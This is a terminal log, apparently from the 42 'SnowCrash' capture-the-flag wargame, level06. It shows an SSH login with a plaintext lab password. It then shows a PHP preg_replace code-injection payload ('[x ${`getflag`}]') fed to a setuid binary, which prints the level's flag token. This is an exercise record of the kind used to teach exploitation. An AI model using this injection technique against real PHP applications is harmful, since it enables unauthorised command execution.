┌──$ [~/42/2020/snow-crash]
└─>  ssh 192.168.1.64 -p 4242 -l level06
level06@192.168.1.64's password: viuaaale9huek52boumoomioc
level06@SnowCrash:~$ ls -l
total 12
-rwsr-x---+ 1 flag06 level06 7503 Aug 30  2015 level06
-rwxr-x---  1 flag06 level06  356 Mar  5  2016 level06.php

# preg_replace — Perform a regular expression search and replace
# Searches subject for matches to pattern and replaces them with replacement. 
#
# file_get_contents — Reads entire file into a string
# 
level06@SnowCrash:~$ echo '[x ${`getflag`}]' > /tmp/a
level06@SnowCrash:~$ ./level06 /tmp/a
PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
 in /home/user/level06/level06.php(4) : regexp code on line 1
